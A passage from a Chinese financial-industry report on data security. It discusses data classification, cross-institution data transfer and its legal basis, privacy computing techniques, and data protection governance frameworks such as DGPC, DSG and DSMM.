据审核与批准、数据标签与溯源、数据安全审计与报警、数据脱 敏与提取、数据安全事件处置等相关平台化管理功能。 3.金融数据的分类与分级方法 金融行业机构开展数据的分类分级是一项系统性工程, 需要 数据管理组织统筹管理原则、目标、分工、资源等, 充分调动金 融机构业务、技术及功能等业务条线的积极性, 根据业务实际制 定数据字典、数据标准,通过线下采取问卷、访谈等调研方式, 线上采用技术平台与字典、台账方式, 充分平衡业务效率与安全 风险, 对标金融行业数据分类与分级相关标准, 实施数据的分类 分级与识别。分类分级中要注意首先满足合规要求, 确保对各法 律法规、监管政策、国家与行业技术标准的依从性, 分类分级方 法可参考《信息安全技术 数据安全分类分级实施指南(草案)》、 《JR/T 0197-2020 金融数据安全 数据安全分级指南》《JR/T 0171-2020 个人金融信息保护技术规范》的流程和方法, 但也要 注意各级别数据在内部的融合与统一。同时, 在具体分类分级时, 应根据数据资产的有用性、价值性及权属情况等因素进行综合判 断和考虑。此外,分类分级时也要考虑到建立数据资产自动化分 类分级模板, 使用安全自动化编排(SOAR)等技术进行高效智能 识别。具体的分类分级、识别方法可结合标准、工具情况建立统 一流程和标准。 (二)数据出域探究 “数据出域”的概念范畴十分广泛, 以下金融场景皆可认为 是一种数据出域行为: 1.某金融机构领导由于工作事务关系将一些重要数据授权 给某员工知晓, 以便快速推动工作进展; 2.金融机构 B 的工作人员由于业务关系在金融机构 A 内接 触到数据,并采用某种方式(如刻录光盘、书写或单凭记忆等) 将数据录入到金融机构 B 内; 3.金融机构 A 与金融机构 B 签订合同,联合使用对方数据开 展业务。 当然,数据出域也可以发生在不同行业间,甚至国家之间。 本专题聚焦到金融机构间跨实体的数据流通, 也就是金融机构 A 与金融机构 B 之间如何完成数据出域。通过对不同场景进行总结 分析,几种常见的数据出域方式为: 1.金融机构 A 直接传递原始数据给 B。并通过外部管理方式 (如合同)约束 B 对原始数据的使用。 2.金融机构 A 将数据脱敏后传递给 B。并通过外部管理方式 (如合同)约束 B 对脱敏后数据的使用。 3.金融机构 A 采用密码技术(秘密分享、同态加密等)将数 据处理后传递给B。并在管理上保证安全假设的成立,如不串谋、 密钥分割保存等。 以上方式体现了“技术+管理 ”的模式来实现数据出域, 目 的在于保证金融机构 A 对数据的控制权以及 B 对数据的使用权。 但是技术所占比重依次越来越高,在一定程度上降低了管理成本 和管理风险。 金融数据出域的意义在于,金融机构拥有大量的数据, 数据 从金融机构内部流向其他金融机构或者其他行业,才能进一步释 放其潜在的价值。但什么“数据”才能出域, 以何种方式出域才 能满足数据合规的要求, 是金融业重点关注的问题。本专题从数 据出域的本质出发,结合已有的法律法规对数据出域相关问题进 行深入研究。 1.数据出域的概念和意义 (1) 数据出域的定义 (a)“域” “域”是一个逻辑概念。“域”的本质是数据控制者及其所 授权主体对数据可行使的权利的范围, 同时数据控制者及其所授 权主体在该范围内对数据的合规使用负责。这些权利具体表现为 通过设备、应用程序以及其他方式所能够进行的对数据的查看、 处理、销毁以及授权等一系列行为。数据控制者可以有一个, 也 可以有多个。 这些权利当中最根本的是数据控制者对数据使用范围、使用 方式和使用目的的控制, 涵盖能够召回、撤销数据的使用,以及 对数据的使用情况进行追溯, 出现事故时能够取证、追责等。如 果数据控制者丧失了对数据的根本权利, 就无法对数据进行有效 控制,也没有能力保障数据的合规使用。 可以“完全公开”的数据没有控制者, 其“域”无限大(或 者说没有“域”),这种数据的使用方式和使用目的不受特定控 制者控制,不在本专题重点讨论。 (b)数据出域 数据“出域”,本质是数据控制者对权利进行了让渡, 比如 允许他人查阅数据、使用数据等。也就是说, 因为权利的让渡导 致“域”的变化,即数据出域。在数据要素流通背景下,金融机 构数据出域的真正难点是,在保留控制数据使用方式和使用目的 的前提下让渡数据的使用权。数据“出域”的“源域”和“目的 域”应该就“数据使用方式和使用目的”具有一致的规则和约束, 包括法律法规、政策、自律公约、标准等。 金融数据出域除了涉及金融机构,实际上还涉及监管方。从 《数据安全法》可以看出,数据控制者承担数据安全主体责任, 而主管部门承担监管职责。从监管方的角度看, 数据“跨域”相 比数据“出域”显得更为贴切。当前数据跨域流通给监管带来新 的挑战和难度, 详见六(二) 3 的分析。 数据“出域”可以发生在个人之间、组织之间、行业之间, 甚至国家之间。如个人数据“出域”一般依托身份管理和访问控 制实现, 出域的目的可能是围绕一项具体事务(如工作任务)进 行数据共享, 遵从企业内部的规章管理制度。在数据要素发展趋 势下, 金融机构数据“出域”一般是为了提升金融数据的潜在价 值,在遵从行业标准、自律公约、监管约束下让渡数据的使用权。 数据出域的两种特殊情况是: 1)由于转让、并购等方式导致的数据控制者的变化。这种 情况下的出域, 由新的控制者对数据使用方式和使用目的进行控 制。 2)由于将数据公开从而放弃数据控制权。这种情况下数据 在“目的域”没有控制者。 以上两种特殊情况在后文中不再详细讨论。本章节重点讨论 金融机构 A 在保留对自身数据控制能力(对使用方式和使用目的 的控制) 的前提下如何将数据的使用权让渡给 B,从而实现金融 数据要素价值流通。 (2) 数据出域的意义 金融业作为数据密集型和科技驱动型行业,充分发挥其数据 要素的经济社会价值, 已经成为一项重要而紧迫的课题。金融机 构数据“出域”能够释放金融数据的潜在价值, 为业务赋能提供 有效支撑,提高金融机构竞争力;同时与外部多源数据的融合使 用, 能够进一步开拓共创共享的数据合作生态, 在合法合规、保 证数据安全的前提下, 推动数据跨机构、跨行业、跨地域自由流 动。 数据出域的底线是要确保对数据使用方式和使用目的的控 制, 减少隐私信息泄露、数据滥用、危害国家数据安全等数据要 素利用的负外部性,推动数字经济高质量发展。 2.数据出域相关法律与标准 目前法律法规对“数据出域”尚未有明确的规定,但可从数 据流动的视角,在相关法律法规当中找到相关依据, 如数据的“提 供”、“转移”、“委托处理”、“交易”、“跨境”等。 关于“数据提供”, 《网络安全法》规定了, 网络运营者未 经被收集者同意不得向他人提供个人信息,但是经过处理无法识 别特定个人且不能复原的除外; 同时还规定了相关人员履职过程 中知悉的个人信息、隐私、商业秘密, 不得泄露、出售、非法向 他人提供。而《数据安全法》则将数据的传输、提供定义为数据 处理的一种方式,在保障数据安全的前提下, 鼓励数据依法合理 有效利用与自由流动。《个人信息保护法》也将传输、提供定义 为个人信息处理的方式。规定了个人信息处理者向他人提供其处 理的个人信息, 合并、分立转移个人信息时, 需向个人告知接收 方相关信息。在公共场所收集的个人图像、身份特征信息仅能用 于维护公共安全,个人单独同意,才可对外公开或向他人提供。 《儿童个人信息网络保护规定》规定网络运营者向第三方转移儿 童个人信息,应进行安全评估。为保护个人信息主体的权利,《个 人信息保护法》规定在处理个人信息前必须征得个人的同意, 并 列举了不需取得个人同意的例外情况, 包括履行法律义务、履行 个人合同、应对突发公共卫生事件、公共舆论监督报道、个人信 息已公开等。金融机构开展业务时, 参照《银行业金融机构数据 治理指引》等行业政策, 如需合理使用个人信息,应对访问和拷 贝等进行行为监控和权限控制;而在响应监管要求履行反洗钱、 反恐怖主义融资等义务时,金融机构也应依据《反洗钱法》等注 意保护个人信息。 关于“委托处理”,《数据安全法》规定服务提供者应当依 法取得许可。《个人信息保护法》与《儿童个人信息网络保护规 定》皆规定了委托处理行为不得超授权范围。其中, 《个人信息 保护法》规定了当委托合同不生效、无效、被撤销、终止,受托 人应当将个人信息返还个人信息处理者或者予以删除、不得保留, 同时禁止了未经个人信息处理者同意的转委托行为。《儿童个人 信息网络保护规定》规定了网络运营者委托第三方处理儿童个人 信息的情况, 需对受托方进行安全评估, 签署委托协议, 明确责 任、处理事项、期限、目的等。 关于“数据跨境”,《网络安全法》、《数据安全法》、《个 人信息保护法》皆有相关规定。《网络安全法》规定了关键信息 基础设施的运营者向境外提供个人信息和重要数据时, 需进行安 全评估, 并规定了相关罚则。《数据安全法》提出国家将建立国 家安全审查制度,参与国际交流与合作、国际规则和标准制定, 促进数据跨境安全、自由流动; 关键信息基础设施的运营者部分 则与《网络安全法》进行了衔接。而个人信息处理者向境外提供 个人信息,依据《个人信息保护法》, 在遵守相关法律法规的前 提下, 还需履行告知并取得单独同意的义务。此外, 《网络数据 安全管理条例(征求意见稿)》规定了掌握超过 100 万用户个人 信息的数据处理者赴国外上市的或者赴港上市可能影响国家安 全的, 应当申报网络安全审查; 而《数据出境安全评估办法(征 求意见稿)》更是对个人信息、敏感个人信息、重要数据等的数 量、范围种类, 以及出境的目的、范围、方法等进行的细化要求, 并规定了受理数据出境安全评估的政府部门及其工作办法,这也 体现出国家对数据跨境相关制度正逐步完善。 关于“数据交易”,《网络安全法》中数据范围仅针对通过 网络收集的电子数据, 而《数据安全法》则包含了电子以及其他 形式记录的数据。另外, 《数据安全法》对数据交易中介提出了 相关要求与相应罚则。《个人信息保护法》也提出不得非法收集 或非法买卖个人信息, 《电子商务法》更进一步提出了违反个人 信息保护相关规定的, 将依照《网络安全法》等相关条款进行处 罚。 相关的规定在标准当中亦有迹可循。《信息安全技术 大数 据服务安全能力要求》《信息技术 大数据 数据分类指南》、《信 息安全技术 个人信息安全规范》等相关国家标准中规范了与数 据出域相关的若干术语和概念,包含数据分发(数据交换54 、数 据交易、数据共享55 、数据公开等)、数据跨境或出境、个人信 息处理(委托处理56、共享、转让57、公开披露等) 等, 主要含义 为将原始数据、处理数据、分析结果等形式的数据传递给内部或 外部实体的过程。 而《金融数据安全 数据安全分级指南》《金融业数据能力 建设指引》《个人金融信息保护技术规范》《金融数据安全 数 据生命周期安全规范》等金融行业标准, 以及《大数据开放共享 安全管理规范》《数字化改革 公共数据分类分级指南》等地方 标准则在国家标准的基础上,为应对数据汇聚、融合58计算(衍 54 数据在企业内外部的流转交互,包括按一定策略引入外部数据供内部应用以及有选择地对外提供企业内部数据 等。数据交换的主要目的是通过及时高效获取外部数据和安全合规分享内部数据,从而更好地发挥数据价值。开 展数据交换需建立明确的交换目录和策略,并做好交换合作方的管理。 55 金融数据在不同部门或机构之间进行分享,包含与行业主管部门的数据分享,各方均承担该数据相关权利和义 务的过程。 56 金融业机构因金融产品或服务的需要,在不改变该数据相关权利和义务的前提下,将数据委托给第三方机构进 行处理,并获取处理结果的过程。此处委托处理也包括纸质单据 OCR 作业、纸质单据人工录入等。 57 金融业机构将数据移交至外部机构,不再享受该数据相关权利和不再承担该数据相关义务的过程。 58 金融业机构因提供金融产品和服务、开展经营管理等活动,在机构内部不同部门之间或本机构与外部机构之 间,进行多源或多主体的数据汇集、整合等产生数据的过程。 生数据、分析结果、数据模型等)后可能带来的安全风险,提出 了一些细化的要求。 综上所述,当前的法律法规、政策标准中有不少与数据出域 的相关术语、概念,如表 1 所示。 表 1 术语、概念与数据出域的关系 项目 分类 术语、 概念 控制 权 控制权变化 说明 使用 权 使用权变化 说明 主要出处 法律法规 对外提 供 改变 控制者与接 收方共享 出让 跟随控制权 变化 《网络安全法》 《个人信息保护 法》等 委托处 理 未改 变 控制者独享 未出 让 跟随控制权 变化 《个人信息保护 法》《儿童个人信 息网络保护规定》 等 数据出 境 改变 控制者与接 收方共享 出让 跟随控制权 变化 《网络安全法》 《数据安全法》 《数据出境安全评 估办法(征求意见 稿)》等 数据交 易 改变 控制者与接 收方共享 出让 跟随控制权 变化 《网络安全法》 《数据安全法》等 数据转 移 改变 接收方独享 失去 跟随控制权 变化 《儿童个人信息网 络保护规定》等 数据公 开 改变 不受控制 出让 跟随控制权 变化 《个人信息保护 法》等 标准 数据分 发 改变 控制者与接 收方共享 (如果公 开,则不受 控制) 出让 跟随控制权 变化 GB/T 38667-2020 《信息技术 大数据 数据分类指南》等 数据交 换/共 享 改变 控制者与接 收方共享 出让 跟随控制权 变化 GB/T 39788-2019 《信息安全技术 数 据安全能力成熟度 模型》、 JR/T 0218-2021《金融业 数据能力建设指 引》、 JR/T 0171- 2020《个人金融信 息保护技术规范》 等 数据公 开 改变 不受控制 出让 跟随控制权 变化 GB/T 35273-2020 《信息安全技术 个 人信息安全规 范》、 GB/T 35274- 2017《信息安全技 术 大数据服务安全 能力要求》等 数据交 易 改变 控制者与接 收方共享 出让 跟随控制权 变化 GB/T 38667-2020 《信息技术 大数据 数据分类指南》、 GB/T 37932-2019 《信息安全技术 数 据交易服务安全要 求》等 数据跨 境、出 境 改变 控制者与接 收方共享 出让 跟随控制权 变化 GB/T 35273-2020 《信息安全技术 个 人信息安全规范》 等 委托处 理 未改 变 控制者独享 未出 让 跟随控制权 变化 GB/T 35273-2020 《信息安全技术 个 人信息安全规 范》、 JR/T 0171- 2020《个人金融信 息保护技术规范》 等 数据转 让 改变 接收方独享 失去 跟随控制权 变化 GB/T 35273-2020 《信息安全技术 个 人信息安全规 范》、 JR/T 0171- 2020《个人金融信 息保护技术规范》 等 数据汇 聚 改变 控制者与接 收方共享 (接收方持 有汇聚后全 部数据的控 制权) 出让 跟随控制权 变化 JR/T 0197-2020 《金融数据安全 数 据安全分级指 南》、 JR/T 0223- 2021《金融数据安 全 数据生命周期安 全规范》等 数据融 合 未改 变或 改变 控制者独享 或控制者与 接收方共享 (对计算结 果评估) 出让 不论控制权 是否变化, 使用权均已 出让 GB/T 35273-2020 《信息安全技术 个 人信息安全规 范》、 JR/T 0171- 2020《个人金融信 息保护技术规范》 等 从数据控制者对于权利让渡的角度来看, 这些术语、概念的 定义和相应的要求条款, 其主要集中在通过数据交易等途径直接 进行“控制权”的改变, 其对象多为明文形式的原始数据或脱敏 后数据。而针对包含个人信息的数据,则增加了告知同意要求, 但对于去标识化、匿名化等概念,没有进行进一步的分析,给出 可用于分离数据“使用权”的技术指南。值得注意的是, 金融行 业标准和部分地方标准, 已经关注了数据汇聚、融合后可能导致 的数据安全级别变化, 却没有将物理汇聚和融合计算二者明确区 分。对于融合计算, 依据对计算结果评估,可能在安全级别降级 的同时, 达到在“控制权”未发生改变的前提下,只出让了数据 的“使用权”的数据共享、流通。 3.数据出域的难点 数据出域的难点在于合规,具体来说就是采用什么样的方式 和手段才能不违反合规要求。当前数据出域面临的合规问题主要 包括: (1) 数据出域合规性缺少共识 目前金融业机构数据出域面临的首要问题是行业监管部门 未对数据出域出台明确规定, 什么样的数据可以出域、如何出域 等未给定明确界限,金融业机构在具体的数据出域场景中存在监 管压力, 如何在不违反数据合规要求的条件下达成机构间的数据 合作成为金融业机构的难题。同时, 金融行业在不断探索多方安 全计算、联邦学习等隐私计算技术, 尝试解决数据出域问题, 但 相关技术如何合规使用, 在没有顶层设计规范的情况下产业界仍 然缺少共识,缺乏落地实施路径。 (2) 数据控制权改变导致合规风险加大 通过前文与数据出域相关问题的法律法规分析可知, 目前大 多数的数据出域方式仍然会导致数据控制权的改变。这样会带来 潜在的合规风险,具体表现在: (a)多数据控制主体难免会对数据的使用方式和使用目的 存在授权上的歧义。比如 A 将数据共享给 B 后, A、B 双方都对 数据具有一定的控制权, 但 B 对数据的后续授权使用是否会超出 A 原来的授权本意是不明确的。 (b)数据安全事件追责难。传统数据明文的出域方式大多 依靠管理手段。这种方式造成的数据安全事故难以追责, 因为数 据在多个主体间的复制共享导致责任链变长,可能导致法律与责 任边界模糊,难以追溯到具体的责任主体。 (3) 多主体共同参与增加新的监管难度 随着数据要素化时代的到来,多主体之间为实现同一应用目 标而进行数据融合计算的方式将成为常态。在这种方式下,需要 保证多个数据控制者的合法数据权益,保证数据在授权的条件下 被使用, 即数据的使用方式、使用目的需要征得数据控制者的同 意。另外,对算法的安全性、可解释性等也需要有相关要求, 保 证数据用途被数据控制者所获知。在数据要素流通的生态环境中, 算法也可能由独立的主体来提供。因此, 多个主体共同参与的特 性将对整个数据流通过程的合规监管提出新的挑战。 (4) 数据跨境问题 国际上各国在国家安全、隐私保护、产业能力等多元因素的 复杂影响下构建跨境数据流动监管制度。这些制度都有一定的差 异性。我国的个人信息保护法、数据安全法等相关法律法规和欧 盟的 GDPR、美国的“跨境隐私保护规则”(CBPR)在理念上有很 大不同, 数据跨境流通需要找到彼此之间契合点,如在统一的规 则下控制数据的用途用量、进行安全事件的举证追责以及执法等。 4.隐私计算技术与数据出域 我国金融业经过多年发展,已积累了海量的数据资源, 通过 数据出域推动多方数据安全融合,构建数据要素市场的基础相对 成熟。在这种趋势下, 金融机构和科技公司积极探索多方安全计 算、联邦学习、可信执行环境等隐私计算技术, 旨在通过这些技 术方法降低数据出域的合规风险,积极推动数据要素流通。 多方安全计算、联邦学习、可信执行环境等隐私计算技术与 传统技术的最大区别在于,这些技术通过“可用不可见”的方式 实现数据流通, 也就是将数据的使用权剥离出来进行流通,而保 证数据的控制权不变。这为数据出域的合规性提供了一条全新的 思路。具体来说: (a)多方安全计算技术将数据转化为计算因子, 而计算因 子的最大特点在于其承载了数据的计算价值(使用价值), 并由 于其基于密码学生成, 安全性具有严格的数学证明, 保证其他参 与方无法通过计算因子获得数据本身或者数据的控制权。同时, 计算因子承载了原始数据所有的计算价值(使用价值), 基于计 算因子的流通与直接明文方式的交付能够实现相同效果的使用 权让渡, 也就是能够产生相同的计算结果,而计算结果才是数据 流通需求方真正的诉求。 (b)联邦学习是一种分布式学习技术,数据控制者将数据 在本地转化为梯度等中间参数, 通过传递这些中间参数让渡使用 权。数据的使用价值体现在这些参数的建模能力上。从控制权方 面看,这些中间参数可能会泄漏原始数据从而使得控制权发生转 移,因此一般会采用额外的技术方法对这些参数进行再次处理, 比如采用密码技术转化。从使用权让渡方面看, 为达到好的建模 效果, 一般需要进行多个轮数的“让渡”。 (c)可信执行环境技术使得数据控制者能够将自己的数据 封闭在安全可信的环境内,在该环境内将这些数据的使用权让渡 给可信的应用程序(TA)。因此,数据控制者通过这个环境的安 全性来保证自己对数据的控制权没有发生转移。 以上三种技术在解决“数据出域”问题上仍然存在一些假设 和前提。多方安全计算技术一般存在半诚实模型或恶意模型的假 设, 即假设参与方是半诚实的或恶意的, 以及不诚实参与方不超 过一定数量等, 从而根据这些假设条件选择合适的协议类型。联 邦学习假设中间参数仅承载数据的使用价值部分(建模能力)而 不含有控制权成分,所采用的密码技术同样遵从上述类似的安全 假设。可信执行环境依赖于对硬件安全的信任, 包括硬件供应商 及其工程实现过程。这些假设条件都旨在防止数据明文泄露, 也 就是保证数据控制者始终持有数据的原有控制权。需要其他方法 措施(管理或技术)来保证这些安全假设的成立,才能使隐私计 算技术行之有效。 除了上述三个主流技术, 还有其他的隐私计算技术, 对数据 出域的影响都不尽相同。因此不能简单地将隐私计算与数据出域 的合规性等同起来,需要根据具体应用环境来确定安全需求和安 全假设, 并选择相应的技术类型。 另外,隐私计算在使用时仍然存在以下问题需要注意: (a)算法安全性。如果输入到隐私计算过程中的一个算法 存在逻辑漏洞或恶意目的,很可能会泄露原始数据, 导致数据控 制权非预期的转移。 (b)数据用途用量。数据用途用量除了体现在一次数据的 使用上, 还包括同一批数据被不同算法多次使用的情况。虽然每 次数据的使用都能保证数据控制权不发生转移, 但同一批数据被 不同算法多次使用,可能会让一些恶意方通过多次计算结果的关 联性来推断原始数据,导致数据控制权非预期的转移。 (c)系统整体安全性。即使隐私计算技术已经保证了数据 计算过程中的安全性,但是如果其他传统的数据安全技术没有配 置到位(如数据传输加密技术) ,数据泄密事件仍会发生,数据 出域时仍难以保证数据的控制权。 以上问题并非隐私计算技术本身的问题, 而是将其用于保证 金融数据出域合规性时碰到的其他问题。需要引起关注并结合不 同的方法手段进行规避。 5.实现数据安全出域的建议 (1) 多技术手段并举辅助隐私计算, 促进金融数据出域 合规性 根据前文分析, 隐私计算技术的假设条件的成立不是隐私计 算技术本身能够保证的, 比如多方安全计算假设条件的成立需要 各参与方在其声明的行为模式下进行计算。传统的方法是基于管 理控制, 比如签订线下协议书(合同) ,对违反合同的行为需要 诉之于法律法规。但纯靠管理措施和法律约束, 会面临举证难的 问题。同时隐私计算技术在应用过程中还面临算法安全性、数据 用途用量等问题。以上问题除了通过管理方法解决, 也可选择采 用技术方法进行辅助。 一种思路是将传统的合同映射为一种电子合约机制。具体地, 对算法进行安全性审核后,各数据方对数据的使用进行授权, 并 将本次数据出域的算法、数据使用授权情况(如数据用量)、各 方的角色定位、行为承诺等关键内容体现在隐私计算的电子合约 中, 各方对合约签名确认,后期严格按照合约进行计算。在整个 数据出域计算的过程中对计算合约的达成、执行、结果输出等关 键环节进行存证(可结合区块链技术),保证各方的行为可审计、 可追溯。这样通过计算合约和存证的技术方法保证了各方能够按 照所声明的方式进行数据出域、完成计算过程。计算合约机制适 用于多方安全计算、联邦学习、可信执行环境等多种技术类型, 有效保证了数据的用途用量可控,维护了数据控制者的权益。 (2) 制定数据出域风险评估标准与实施指南 鉴于目前尚未有关于数据出域相关的制度与标准建设, 导致 金融机构在出域风险评估方面缺乏实际操作指引,因此亟须推动 数据出域风险评估标准与实施指引出台, 明确不同场景下数据控 制者面临的数据出域风险,评估隐私计算技术,以及其他辅助技 术(如计算合约、存证机制) 对数据出域的影响,构建数据出域 的合规性度量框架。进一步明确金融机构数据出域管理手段与技 术手段的适配性问题,提高金融机构数据出域过程中的可操作性。 (3) 推动数据出域技术应用的试点工作 以多方安全计算、联邦学习、可信执行环境为代表的隐私计 算技术为解决数据出域提供了创新路径, 应积极推动隐私计算数 据出域应用试点工作, 考虑不同技术路线、不同计算架构、不同 应用场景、不同类型金融机构数据出域的实际情况, 重点考察多 个数据控制者与被授权使用者的数据出域的风险链条, 以及不同 技术路线下数据出域风险的可监管性等。 (4) 以数据出域促进数据流通网建设 数据出域并非仅仅为了两个金融机构间的数据融合利用, 其 最终目的是促进整个金融行业的数据流通。因此,在数据出域的 基础上,下一步将考虑多个金融机构或不同团体间的数据高效、 合规流动,构建整个金融行业的数据流通网。 四、金融数据保护治理体系 金融业一直是信息化、数字化建设中的领先行业。金融行业 的发展与国民经济各个行业的繁荣发展紧密相关。在金融业的发 展过程中,逐渐积累并形成了大体量、多层次、多样化的数据资 产, 这些数据资产不仅是行业自身的资产,更是国家的资产。因 此,对于金融数据保护治理的建设非常重要。 我国在借鉴国际上先行的法律法规和标准上,为满足国家安 全需要, 也适时地推出了《数据安全法》。其中有“各地区、各 部门对本地区、本部门工作中收集和产生的数据及数据安全负责。 工业、电信、交通、金融、自然资源、卫生健康、教育、科技等 主管部门承担本行业、本领域数据安全监管职责。”的明确要求。 同时, “数据保护”也是金融业数据管理的 8 个能力域之一(见 《JR/T 0218-2021 金融业数据能力建设指引》) 。在相关背景 和要求之下,金融数据保护治理的建设将充分借鉴《GB/T 32988- 2019 数据安全能力成熟度模型》中组织建设、制度建设、流程 规范、技术支撑 4 个数据安全能力维度, 根据金融行业特点, 构 建具有金融行业特色的数据保护治理框架和内容。 (一)数据保护治理主要框架介绍 近年来, 数据保护治理的重要性愈发得到业界重视, 多种数 据安全治理框架相继提出,比较有代表性的数据保护治理框架包 括微软 DGPC 框架、Gartner DSG 框架,以及我国国家标准《信息 安全技术 数据安全能力成熟度模型》(GB/T 37988-2019)中的 数据安全能力成熟度模型(DSMM, Data Security Maturity Model)等。 1.隐私、保密和合规框架(DGPC) 2010 年,微软提出了以隐私、保密和合规为治理目标的数据 保 护 治 理 框 架 DGPC ( Data Governance for Privacy, Confidentiality and Compliance)59。DGPC 框架由人员、流程 和技术三个核心能力领域组成, 旨在通过统一的、跨部门的协作, 实现数据保护治理。 人员领域。首先需要建立由组织内部人员组成的 DGPC 团队, 团队成员共同负责定义与数据分类、保护、使用和管理有关的治 理原则、策略和过程。同时,组织需要明确 DGPC 团队的角色和 职责,并为 DPGC 团队提供必要的资源支持。 流程领域。 在建立了 DGPC 团队的基础上, 组织需要对数据 保护治理的相关流程进行清晰定义。首先,需要对组织必须满足 的各类权威文件(包括法律法规、标准规范, 以及企业政策和战 略文件等)进行全面梳理,理解权威文件间的相互关联、相互影 响, 并将组织的业务和合规性要求整合到统一框架中。然后, 需 要定义满足各类合规要求的指导原则和策略。最后, 对数据流动 过程中数据保护、隐私和合规所面临的威胁进行识别, 分析风险 并根据风险控制目标采取必要的安全控制措施。 59 A Guide to Data Governance for Privacy, Confidentiality, and Compliance, Microsoft, 2010. 技术领域。 微软围绕 DGPC 框架开发了一套特定的数据流分 析方法, 关注数据生命周期、核心技术领域、组织的数据隐私和 机密性原则三个核心元素。其中, 数据生存周期包括数据的采集、 存储、处理、更新、转移、删除;核心技术领域包括安全基础设 施、身份鉴别与访问控制、数据保护、审计和报告; 数据隐私和 机密性原则包括数据生命全周期内遵守策略原则、最小化未授权 访问和数据滥用风险原则、最小化机密数据丢失影响原则、使用 适当的控制措施并证明有效性原则。 DGPC 框架以隐私、机密性和合规为数据保护治理目标, 以数 据生命周期和核心技术领域为核心关注点,基于威胁建模与风险 评估的方法,从方法论的层面对组织如何实施数据安全治理进行 了阐述。 2.数据安全治理框架(DSG) 2015 年,Gartner 提出了数据安全治理(DSG, Data Security Governance)概念60,从方法论的角度阐述了数据安全治理的框 架。 DSG 框架特别强调数据保护治理应该从组织的业务风险分析 出发, 对组织涉及的数据集进行识别、分类和管理, 并针对数据 在不同场景中的机密性、完整性、可用性定义和实现安全策略。 同时, DSG 框架强调数据安全团队可以面向数据全生命周期过程 进行业务影响分析, 及时发现和处理数据安全风险。DSG 框架将 60 How to Use the Data Security Governance Framework, Gartner, 2018. 数据保护治理的具体实现过程划分为五个阶段, DSG 框架如图 1 所示。 图 1 DSG 框架示意 平衡业务需求和风险。从组织的发展战略、治理、合规、IT 策略及风险容忍度五个关键方面出发, 分析安全需求, 并制定符 合组织经营发展与风险管控需求的数据安全治理策略。 数据梳理和数据生命周期管理。对组织管理的数据资产进行 全面识别与梳理,覆盖数据获取、存储、分析、演变、归档、销 毁等数据生命周期各个环节,对数据进行分类分级。 定义数据安全策略。需要从两个方面定义组织的数据安全策 略, 首先需要明确数据保护的对象、所涉及人员与访问行为, 然 后基于数据分类分级的结果针对性地制定数据安全策略。 部署安全能力与产品。组织需要根据数据资源的类型、存储 位置、应用场景等, 采用和部署多种安全工具以支撑数据安全策 略的实施,包括密码系统(Crypto)、以数据为中心的审计和保 护系统(DCAP, Data Centric Audit and Protection)、数据 防泄漏系统(DLP, Data Loss Prevention)、云访问安全代理 系统(CASB, Cloud Access Security Brokers)、身份识别与 访问管理系统(IAM, Identity and Access Management)、用 户与终端行为分析系统(UEBA, User and Entity Behavior Analytics)。 策略配置与同步。为所有安全能力与产品配置策略并保持策 略的一致与同步,策略执行对象包括数据库、大数据系统、文件 类数据、云端数据、终端数据等,确保数据保护产品之间能够互 相协作, 形成一体化的安全体系。 DSG 框架从方法论的角度阐述了数据保护治理的思路、基本 框架和步骤,并从宏观层面给出了数据保护能力与产品的部署建 议, 组织在开展数据保护治理实践过程中,可以根据治理对象和 场景的不同采取差异化的部署方式并按需组合使用。 3.数据安全能力成熟度模型(DSMM) 2019 年 8 月,全国信息安全标准化委员(TC-260)正式发布 《信息安全技术 数据安全能力成熟度模型》(GB/T 37988-2019) 国家标准61,提出数据保护成熟度模型(DSMM, Data Security Maturity Model)。DSMM 模型参考通用的能力成熟度模型,对数 据保护能力成熟度进行了定义和等级划分,并从数据生命周期安 61 GB/T 37988-2019, 信息安全技术 数据安全能力成熟度模型 全和通用安全出发,定义了数据保护过程域体系,从组织建设、 制度流程、技术工具,以及人员能力四个方面对数据安全能力成 熟度进行分级阐述,提供了针对每个能力成熟度等级的具体要求 和评估方法, DSMM 模型如图 2 所示。 图 2 DSMM 模型示意 DSMM 模型包括以下三个维度: 数据生命周期安全。围绕数据生命周期安全(包括数据采集、 传输、存储、处理、交换、销毁)和通用安全(包括数据安全策 略规划、组织和人员管理、合规管理、数据资产管理、数据供应 链安全、元数据管理、终端数据安全、监控与审计、鉴别与访问 控制、需求分析、安全事件应急)各个关键环节,提出大数据环 境下, 以数据为中心、面向数据生命周期各阶段的数据保护过程 域体系, 共划分为 30 个过程域。 安全能力维度。基于所提出的数据保护过程域体系, 将每个 过程域所需要具备的数据保护能力进一步划分为四个维度,包括 制度流程、人员能力、组织建设和技术工具四个维度。 能力成熟度等级。基于统一的分级标准,将数据保护能力成 熟度划分为持续优化、量化控制、充分定义、计划跟踪和非正式 执行五个等级, 并提出了各个数据保护过程域中不同能力成熟度 等级所对应的安全要求。 DSMM 模型将关注视角从数据本身扩展到数据生命周期各阶 段, 定义了一套以数据为核心的、围绕数据生命周期的能力评估 模型, 可以为组织开展数据保护治理实践提供参考。同时,DSMM 模型也可以作为一种评估方法, 用于对组织的数据保护治理能力 进行客观评价, 帮助组织更好地感知数据保护治理水平, 明确需 要持续提升的环节。 (二)金融数据保护治理总体框架建议 好的企业组织架构是企业战略级工作执行的有力基础。通过 组织架构的建立适配数据保护治理工作的要求和落地, 将数据治 理工作的执行融合到架构建立中,才能够快速推进和保障有序开 展。 针对数据保护治理来说, 涉及公司所有部门的相关工作, 从 技术、业务到法律、管理、运营等等, 从而需要建立相应的流程 制度,规范数据的管理和治理工作,并防范数据泄漏安全风险。 在数据保护治理工作的过程中, 离不开技术的支撑, 从而实 现数据保护治理的数字化转型。通过技术保障确保数据保护治理 工作的高效推进,同时实现数据保护治理的可记录、可追踪、可 审计。 企业组织架构是数据保护治理工作的基石,流程规范是道路, 技术保障是工具。三者相辅相成,共同促进数据保护治理的实现。 金融数据保护治理总体框架如图 3 所示。 图 3 金融数据保护治理总体框架 本章节将从组织建设、管理体系建设、技术支撑建设三个小 节为金融机构提供数据保护治理建设范式。 (三)组织建设 1.组织架构 依托董事会、监事会、高管层等公司治理层面的精准履职、 决议授权,保障组织机构职能管理的顺畅运行。建立由高管层直 接领导, 企业或组织内部相关部门负责人作为主要成员的数据保 护工作的决策机构,名称可以是数据保护领导小组或数据保护委 员会等名称。这通常是一个虚拟机构, 职责是负责企业或组织的 数据安全保护工作的日常决策和议事协调,根据企业或组织的经 营战略和内外部信息安全形势制定数据保护目标和管理策略;总 体部署数据保护工作, 统筹协调数据保护的重大工作和重要任务, 为任务的落实提供组织、资源和管理保障。 管理层主要由数据保护的牵头管理部门的人员组成,负责对 决策层的决策和监管要求进行规范和细化,推进企业或组织数据 